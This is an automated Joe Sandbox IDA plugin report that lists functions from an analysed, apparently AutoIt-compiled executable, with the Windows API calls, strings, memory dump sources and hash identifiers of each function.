                                                            Function 00882882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00882892
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008828C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: 7d701e3aa5cdbdeae7c5c7b3ed6039bbfb523ebadfba130bddb4652d917b5169
                                                            • Instruction ID: cf284872d5b55d02848f00fe52fb31ee78b8ff0600c567a6273f6d3d117409aa
                                                            • Opcode Fuzzy Hash: 7d701e3aa5cdbdeae7c5c7b3ed6039bbfb523ebadfba130bddb4652d917b5169
                                                            • Instruction Fuzzy Hash: 09311771800119AFCF11AFA5CC85EEEBFB9FF08300F104029F815E6166EB315A96DBA1
                                                            Function 00896CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00896D86
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00896DC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: 69de0e830e4bd080005376dc773f5a7cbd7a0689b52f5ccf3ddd82ce233425dd
                                                            • Instruction ID: 80e73a966f8579d7164ce48673189e4ab1265b202c31dfae453babd69fdbbbff
                                                            • Opcode Fuzzy Hash: 69de0e830e4bd080005376dc773f5a7cbd7a0689b52f5ccf3ddd82ce233425dd
                                                            • Instruction Fuzzy Hash: F9318F71210604AEDF14AF68DC80AFB77B9FF48764F188619F9A6D7190DB31AC91CB60
                                                            Function 00872D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00872E00
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00872E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: a0a41da97058bfd4c5c0736be1ea04e0aa2c2e1a94e1fe0cc26034ea51472493
                                                            • Instruction ID: 39501f43c3f4bf4ef0d920cbf120aaa329ee4ab06e538cd4edb5690f4e3ae653
                                                            • Opcode Fuzzy Hash: a0a41da97058bfd4c5c0736be1ea04e0aa2c2e1a94e1fe0cc26034ea51472493
                                                            • Instruction Fuzzy Hash: D131E932600309EBEB24CF58C88579EBBB5FF45350F14802EE9C9D61A6E770D944CB51
                                                            Function 00896943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008969D0
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008969DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: f87514ebbc67b119d1583057b91ff4a51da81f7b4a2ef7af08179a678e1bb55d
                                                            • Instruction ID: 498f0a24050fd02eae88a8d1a2cfb00b2effc82db8df2e3e87dff988b45cadc1
                                                            • Opcode Fuzzy Hash: f87514ebbc67b119d1583057b91ff4a51da81f7b4a2ef7af08179a678e1bb55d
                                                            • Instruction Fuzzy Hash: F611B6716002086FEF11AE14CC90EFB3B6EFB993A4F194125F958D7291E6719C6187A0
                                                            Function 00896E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00811D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00811D73
                                                              • Part of subcall function 00811D35: GetStockObject.GDI32(00000011), ref: 00811D87
                                                              • Part of subcall function 00811D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00811D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 00896EE0
                                                            • GetSysColor.USER32(00000012), ref: 00896EFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: ff4b55288d233aff62a17035fbeda2a7627df0070e15cb35c1b314c99f4b1250
                                                            • Instruction ID: ac97e088b3942fd433e0c06d059ca5198fe14e4f38e2c77b9a48ea6a262c2117
                                                            • Opcode Fuzzy Hash: ff4b55288d233aff62a17035fbeda2a7627df0070e15cb35c1b314c99f4b1250
                                                            • Instruction Fuzzy Hash: 77215972610209AFDF04EFA8DD45AFA7BB8FB08314F194629FE55D3250E634E8619B50
                                                            Function 00896B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00896C11
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00896C20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 639be0a763baa70507fc07ddc6cf348a97369480a8746ba171faa5a94601af4c
                                                            • Instruction ID: 7b7bc7d9b41b6bce66b2424ffd3977f6424c6b6ec5b1201643fa69f54ec1c124
                                                            • Opcode Fuzzy Hash: 639be0a763baa70507fc07ddc6cf348a97369480a8746ba171faa5a94601af4c
                                                            • Instruction Fuzzy Hash: 09119D71500208ABEF106E649C45AEA3769FB04378F184724FA60D31D0E635DCA0AB60
                                                            Function 00872E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00872F11
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00872F30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: bddc788f2e4b54d85251f9b8c6352270a1282defc5d153e3e01447fcd788e687
                                                            • Instruction ID: 8ea9983f16c6a87f10301ed6414c87ebe7bc6a62d47e9428cfb0177099616c72
                                                            • Opcode Fuzzy Hash: bddc788f2e4b54d85251f9b8c6352270a1282defc5d153e3e01447fcd788e687
                                                            • Instruction Fuzzy Hash: D011B232901128ABDB34EB58DC44B9977B9FB05314F1881B6E958F72A5EBB0ED04C791
                                                            Function 008824CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00882520
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00882549
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: 4ec19ddc0d058b7fd131693bf62a2e508564892042b4047b1440019353ab752d
                                                            • Instruction ID: c9c0fdfe53923667bab4d2c5ca4f8380517ebaa8d89a9dc04df2e747c9f76714
                                                            • Opcode Fuzzy Hash: 4ec19ddc0d058b7fd131693bf62a2e508564892042b4047b1440019353ab752d
                                                            • Instruction Fuzzy Hash: DE11C2B0581229BADB28AF518C99EBBFF68FF06765F10812AF905C6140D2706991DBF0
                                                            Function 008880A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0088830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008880C8,?,00000000,?,?), ref: 00888322
                                                            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008880CB
                                                            • htons.WSOCK32(00000000,?,00000000), ref: 00888108
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 2496851823-2422070025
                                                            • Opcode ID: 38ec333f83760696f0f90925300e46a6ea67238cd66258db95d4e1f182e8d3fb
                                                            • Instruction ID: 9c8288f9010d51f822a4297d12e68f5e2c06f71c4db72921396ebfdffd543e4b
                                                            • Opcode Fuzzy Hash: 38ec333f83760696f0f90925300e46a6ea67238cd66258db95d4e1f182e8d3fb
                                                            • Instruction Fuzzy Hash: A5118234500249EBDB24AFA8CC46FADB764FF44314F108526E911D7292DE71A8158B96
                                                            Function 008692E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00869355
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 083e3569aaac5df4a5139094c574f96c522572e223fbbb7b35a4a04fce73e9a7
                                                            • Instruction ID: d10ab09064a06fd2f989f48208b68e57300f3d5b6657fbba4932232c7b4b50b5
                                                            • Opcode Fuzzy Hash: 083e3569aaac5df4a5139094c574f96c522572e223fbbb7b35a4a04fce73e9a7
                                                            • Instruction Fuzzy Hash: 7F01D271A41218ABCB04EB68CC91DFE776DFF06320B150659F872D73D1DB3158488651
                                                            Function 008691DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 0086924D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 2aecb5f5667e7dd064be581aa095673c9e788c6ff6dd7e0d869a3233c7a29cb9
                                                            • Instruction ID: 4e33bd7e57ff8e2209976b3ecc258e1002d4fc7276d82dbd878b28d7bbc4e9cd
                                                            • Opcode Fuzzy Hash: 2aecb5f5667e7dd064be581aa095673c9e788c6ff6dd7e0d869a3233c7a29cb9
                                                            • Instruction Fuzzy Hash: 17018471A41208BBCB05EBA4C9A6EFF77ACFF45300F150059B962E73C1EA355E489672
                                                            Function 00869264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 008692D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 23ec14e69c4a2fbc57e8b2699e85b78acff2741680cf8898426677c708246643
                                                            • Instruction ID: fdb862c1b7c2b15eb3e14ae6a325baadce81549e41b0599c138d99d401cfb6fd
                                                            • Opcode Fuzzy Hash: 23ec14e69c4a2fbc57e8b2699e85b78acff2741680cf8898426677c708246643
                                                            • Instruction Fuzzy Hash: 62018471A41108B7CB04E6A4C992EEF77ACFF11300B150159F962E32C2DA355E4C9662
                                                            Function 008751CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: cea98f460d3a39749f7bb65fbfef63a605f9a9f5b31d85ffeb22befb43c8739d
                                                            • Instruction ID: 4405bffbb76c1713f8a707d83f89a20bd58084f615b0d1d579f555da1997b799
                                                            • Opcode Fuzzy Hash: cea98f460d3a39749f7bb65fbfef63a605f9a9f5b31d85ffeb22befb43c8739d
                                                            • Instruction Fuzzy Hash: 4AE02B3250022C26D3109699AC05F97F7ACFB40761F00016BFD14D3041E560D90487D1
                                                            Function 008681BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008681CA
                                                              • Part of subcall function 00833598: _doexit.LIBCMT ref: 008335A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: d34ec6f7123e4a9683973f8a1ad744bb567f10495a8dae3c9390642b3cedd5a8
                                                            • Instruction ID: d1fcb4650e570a9577eab62e58c0072078634765a3cae426adf2f20bb0c0f7be
                                                            • Opcode Fuzzy Hash: d34ec6f7123e4a9683973f8a1ad744bb567f10495a8dae3c9390642b3cedd5a8
                                                            • Instruction Fuzzy Hash: 9CD0123228531832D61932A96C0AFC57588EB55B52F044026FB0CD55D389D5959142DA
                                                            Function 0084B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0084B564: _memset.LIBCMT ref: 0084B571
                                                              • Part of subcall function 00830B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0084B540,?,?,?,0081100A), ref: 00830B89
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0081100A), ref: 0084B544
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0081100A), ref: 0084B553
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0084B54E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: 0ee8d6be8a12ceb837c7df9b7d706e6a4970302871638357a2acec26009c1317
                                                            • Instruction ID: 5b58fc5da21865e90d73e4befca46288053fba8afcce497564ff32a4efca0019
                                                            • Opcode Fuzzy Hash: 0ee8d6be8a12ceb837c7df9b7d706e6a4970302871638357a2acec26009c1317
                                                            • Instruction Fuzzy Hash: 5EE06D702007158BD320EF69D804386BBE4FF04755F05892DE546C3752E7B8D448CBA1
                                                            Function 00895BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00895BF5
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00895C08
                                                              • Part of subcall function 008754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0087555E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 3bcbc1803ff5abc5a87e02f1922a8f561336ce5662289d6a123459d63ce5ef0c
                                                            • Instruction ID: 72d7cc441800a94ac3c575f3d1341168ccd093cf70ef1ce48ed05094b05323b0
                                                            • Opcode Fuzzy Hash: 3bcbc1803ff5abc5a87e02f1922a8f561336ce5662289d6a123459d63ce5ef0c
                                                            • Instruction Fuzzy Hash: 46D0C931388311B7E768BB70AC0BF976A24FB10B51F09082AB75AEA1E1D9E49840C654